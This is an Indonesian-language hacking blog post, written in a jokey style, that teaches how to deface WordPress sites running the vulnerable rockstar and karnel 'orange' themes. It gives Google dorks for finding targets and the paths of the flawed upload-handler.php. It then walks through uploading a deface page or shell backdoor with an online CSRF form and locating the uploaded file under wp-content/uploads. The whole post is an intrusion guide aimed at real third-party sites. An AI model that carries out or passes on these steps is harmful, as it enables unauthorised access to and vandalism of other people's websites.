assalamualikum mamank...
kali ini saya mau ngeshare cara deface dengan wordpress orange theme
vulnreability:upload with crsf
lanjut ke langkah-langkahnya:
-kopi dan rokok
-kuota yang banyakk
yang paling terpenting
-DORKKKKKKK yang freshhhhh(use your brain)
-scrip deface/shell backdoor
Shell Backdoor disini
di sini saya akan mengajarkan dengan ekstensi HTML :
Dork:
-inurl:"/wp-content/themes/rockstar-theme/"
-inurl:"/wp-content/themes/karnel-theme/"
kembangin lagii yah mamank biar dapet yang fresh :v
exploit:
-/wp-content/themes/rockstar-theme/functions/upload-handler.php
/wp-content/themes/karnel-theme/functions/upload-handler.php
langkah-langkah
1.pertama dork di google lalu pilih web yang vuln
2.sekarang tambahkan exploit di belakang
contoh:http://www.site.co.li/wp-content/themes/rockstar-theme/functions/upload-handler.php
terus selanjutnya apa ? yah tidur lah :v awokawoka kaga lucu :v
3.terus buka crsf online : https://earthseed.space/csrf.php
terus postfilenya dengan orange_themes
4.sekarang udah terupload :v
terus gimna cara manggil script nya ?
tambahkan exploit:/wp-content/uploads/[tahun]/[bulan]/namascript.html
cukup sekian tutorial dari saya :)
0 Comments